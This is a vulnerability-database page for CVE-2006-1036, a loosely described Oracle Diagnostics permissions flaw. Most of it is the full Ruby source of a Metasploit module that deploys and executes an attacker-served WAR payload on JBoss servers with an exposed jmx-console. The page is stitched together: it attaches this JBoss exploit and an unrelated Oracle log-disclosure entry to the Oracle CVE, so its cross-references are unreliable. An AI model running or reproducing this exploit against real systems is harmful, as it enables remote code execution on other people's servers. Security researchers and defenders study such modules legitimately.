CVE-2006-1036
CVSS 7.5
Published: 2006-03-07 06:02:00
Revised: 2008-09-05 17:00:51

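[Original] Multiple unspecified vulnerabilities in the Oracle Diagnostics module 2.2 and earlier have unknown impact and attack vectors, related to "permissions."


[CNNVD] Oracle Diagnostics module multiple unspecified vulnerabilities (CNNVD-200603-088)

        Multiple unspecified vulnerabilities in the Oracle Diagnostics module 2.2 and earlier have unknown impact and attack vectors related to "permissions."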

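- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]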

- CPE (Affected Platforms and Products)

cpe:/a:oracle:diagnostics:2.0    Oracle Diagnostics 2.0
cpe:/a:oracle:diagnostics:2.1    Oracle Diagnostics 2.1
cpe:/a:oracle:diagnostics:2.2    Oracle Diagnostics 2.2

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1036
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1036
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-088
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/16844
(PATCH)  BID  16844
http://www.integrigy.com/info/IntegrigySecurityAnalysis-OracleDiag0206.pdf
(VENDOR_ADVISORY)  MISC  http://www.integrigy.com/info/IntegrigySecurityAnalysis-OracleDiag0206.pdf
http://secunia.com/advisories/19076
(UNKNOWN)  SECUNIA  19076

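- Vulnerability Information

Oracle Diagnostics module multiple unspecified vulnerabilities
High risk  Insufficient information
2006-03-07 00:00:00 2006-03-08 00:00:00
Remote
        Multiple unspecified vulnerabilities in the Oracle Diagnostics module 2.2 and earlier have unknown impact and attack vectors related to "permissions."

- Advisories and Patches

        No data available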

- Vulnerability Information (F86544)

JBoss JMX Console Deployer Upload and Execute (PacketStormID:F86544)
2010-02-23 00:00:00
jduck  metasploit.com
exploit,web
CVE-2006-1036

This Metasploit module can be used to execute a payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us.

##
# $Id: jboss_maindeployer.rb 8575 2010-02-21 01:44:34Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'JBoss JMX Console Deployer Upload and Execute',
			'Description' => %q{
					This module can be used to execute a payload on JBoss servers that have
				an exposed "jmx-console" application. The payload is put on the server by
				using the jboss.system:MainDeployer functionality. To accomplish this, a
				temporary HTTP server is created to serve a WAR archive containing our
				payload. This method will only work if the target server allows outbound
				connections to us.
			},
			'Author'      => [ 'jduck' ],
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision: 8575 $',
			'References'  =>
				[
					[ 'CVE', '2006-1036' ],
					[ 'OSVDB', '33744' ],
					[ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]
				],
			'Privileged'  => true,
			'Platform'    => [ 'win' ], # linux untested
			'Stance'      => Msf::Exploit::Stance::Aggressive,
			'Targets'     =>
				[
					#
					# detect via /manager/serverinfo
					#
					[ 'Automatic', { } ],

					#
					# Platform specific targets only
					#
					[ 'Windows Universal',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'win'
						},
					]
				],
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(8080),
				OptString.new('PATH', [ true,  "The URI path of the console", '/jmx-console'])
			], self.class)
	end


	def auto_target
		print_status("Attempting to automatically select a target...")

		path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
		res = send_request_raw(
			{
				'uri'   => path
			}, 10)

		if (not res) or (res.code != 200)
			print_error("Failed: Error requesting #{path}")
			return nil
		end

		arch = nil
		plat = nil
		# TODO: detection requires HTML parsing
		arch = ARCH_X86
		plat = 'win'

		# see if we have a match
		targets.each { |t|
			if (t['Platform'] == plat) and (t['Arch'] == arch)
				return t
			end
		}

		# no matching target found
		return nil
	end


	def exploit
		mytarget = target
		if (target.name =~ /Automatic/)
			mytarget = auto_target
			if (not mytarget)
				raise RuntimeError, "Unable to automatically select a target"
			end
			print_status("Automatically selected target \"#{mytarget.name}\"")
		else
			print_status("Using manually select target \"#{mytarget.name}\"")
		end

		# set arch/platform from the target
		arch = mytarget['Arch']
		plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]

		# Generate the WAR containing the EXE containing the payload
		jsp_name = rand_text_alphanumeric(8+rand(8))
		@war_data = Msf::Util::EXE.to_jsp_war(framework,
			arch, plat,
			payload.encoded,
			:jsp_name => jsp_name)

		#
		# UPLOAD
		#
		app_base = rand_text_alphanumeric(8+rand(8))
		resource_uri = '/' + app_base + '.war'
		service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri
		print_status("Starting up our web service on #{service_url} ...")
		start_service({'Uri' => {
				'Proc' => Proc.new { |cli, req|
					on_request_uri(cli, req)
				},
				'Path' => resource_uri
			}})
		print_status("Making the request to the MainDeployer...")
		res = send_request_cgi({
			'method'    => 'POST',
			'uri'       => datastore['PATH'] + '/HtmlAdaptor',
			'vars_post' =>
				{
					'action'      => 'invokeOp',
					'name'        => 'jboss.system:service=MainDeployer',
					'methodIndex' => '21',  # deploy via java.net.URL
					'arg0'        => service_url
				}
		}, 20)
		if (! res)
			raise RuntimeError, "Unable to deploy WAR archive [No Response]"
		end
		if (res.code < 200 or res.code >= 300)
			case res.code
			when 401
				print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
			end
			raise RuntimeError, "Upload to deploy WAR archive [#{res.code} #{res.message}]"
		end

		# wait for the data to be sent
		print_status("Waiting for the server to request the WAR archive....")
		waited = 0
		while (not @war_sent)
			select(nil, nil, nil, 1)
			waited += 1
			if (waited > 30)
				raise RuntimeError, 'Server did not request WAR archive -- Maybe it cant connect back to us?'
			end
		end

		print_status("Shutting down the web service...")
		stop_service


		#
		# EXECUTE
		#
		print_status("Executing #{app_base}...")
		res = send_request_cgi({
			'uri'     => '/' + app_base + '/' + jsp_name + '.jsp',
			'method'  => 'GET'
		}, 20)

		if (! res)
			print_error("Execution failed on #{app_base} [No Response]")
		elsif (res.code < 200 or res.code >= 300)
			print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
		end


		#
		# DELETE
		#
		print_status("Undeploying #{app_base} ...")
		res = send_request_cgi({
			'method'    => 'POST',
			'uri'       => datastore['PATH'] + '/HtmlAdaptor',
			'vars_post' =>
				{
					'action'      => 'invokeOp',
					'name'        => 'jboss.system:service=MainDeployer',
					'methodIndex' => '3',  # undeploy via java.String
					'arg0'        => app_base
				}
		}, 20)
		if (! res)
			print_error("WARNING: Undeployment failed on #{app_base} [No Response]")
		elsif (res.code < 200 or res.code >= 300)
			print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")
		end

		handler
	end


	# Handle incoming requests from the server
	def on_request_uri(cli, request)

		#print_status("on_request_uri called: #{request.inspect}")
		if (not @war_data)
			print_error("A request came in, but the WAR archive wasn't ready yet!")
			return
		end

		print_status("Sending the WAR archive to the server...")
		send_response(cli, @war_data)
		@war_sent = true
	end

end
    

- Vulnerability Information

23652
Oracle E-Business Suite Diagnostics Log File Disclosure

- Vulnerability Description

Unknown or Incomplete

- Timeline

2006-02-23 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete